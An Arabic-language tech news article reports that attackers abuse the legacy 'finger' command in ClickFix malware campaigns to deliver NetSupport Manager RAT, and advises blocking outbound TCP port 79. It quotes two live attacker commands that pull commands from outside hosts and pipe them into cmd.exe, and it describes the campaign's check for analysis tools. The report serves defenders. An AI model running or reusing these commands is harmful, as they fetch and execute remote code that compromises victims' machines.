NG Solution Team
التكنولوجيا

هل يُعيد المهاجمون استخدام أمر “finger” لشن هجمات ClickFix جديدة؟

قام الفاعلون التهديديون بإعادة استخدام الأمر “finger” القديم الذي يعود لعقود مضت لتمكين تنفيذ الأوامر عن بُعد في هجمات جديدة باستخدام برمجيات ClickFix الخبيثة. تم تحديد ملف دفعي يستغل الأمر “finger root@finger.nateams[.]com” لاسترجاع وتنفيذ الأوامر عبر cmd.exe. وكشفت التحقيقات الإضافية عن حملة ClickFix تستخدم الأمر “finger Kove2@api.metrics-strange.com | cmd”، وهو مشابه لحملة أخرى تم الإبلاغ عنها. كانت هذه الاختراقات أكثر تعقيدًا، مستهدفة أدوات تحليل البرمجيات الخبيثة مثل WinDump، filemon، Procmon، x64dbg، vmmap، processlasso، Fiddler، وEverywhere. في حال عدم العثور على أدوات تحليل البرمجيات الخبيثة، يتم تحميل أرشيف ZIP يزعم أنه ملف PDF، ليقوم باستخراج حزمة NetSupport Manager RAT. وللتصدي لهذا الاستغلال، من الضروري حظر حركة المرور الصادرة إلى منفذ TCP رقم 79.

Related posts

كيف تقدم ويب بيز ماجنت رؤى خبيرة حول أحدث البرمجيات والتطبيقات؟

فاطمة أبويوسف

كيف يمكن لمدارس ألبرتا تحسين الأمن السيبراني بعد اختراق كبير؟

خليدي أمينة

ما هي صناديق الاستثمار الثلاثة في الذكاء الاصطناعي التي ستشهد نمواً كبيراً في السنوات الثماني القادمة؟

محمد أبو علي

Leave a Comment

This website uses cookies to improve your experience. We assume you agree, but you can opt out if you wish. Accept More Info

Privacy & Cookies Policy